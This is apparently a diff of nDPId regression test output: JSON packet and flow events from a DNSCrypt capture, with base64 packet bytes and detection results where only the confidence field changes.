02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAXcZhQgAL0R7isKAAAB0frxGdrjAbsGBM5Z8VQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":59,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304599} 
00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":59,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAABQZhQAub0REv8KAAAB0frxGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAXcZhUgAL0R7ioKAAAB0frxGZEDAbsGBBg48VYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":61,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304599} 
00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":61,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAABQZhUAub0REv4KAAAB0frxGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAIcZhZAAL0R0ekKAAAB0frxGZQ+AbsCCIXq8VUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAIcZhdAAL0R0egKAAAB0frxGYYUAbsCCIXq8VcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAAAcsADAHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":946739304599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAAXcZhggAL0R7icKAAAB0frxGefnAbsGBMFR8VgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhtZWdhbmVyZAAAEAABAAAAAAAAAAAABccADAXDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304599,"flow_last_seen":946739304599,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304599,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":65,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304599} 
00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":65,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304599,"pkt":"REREREREZmZmZmZmCABFAABQZhgAub0REvsKAAAB0frxGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 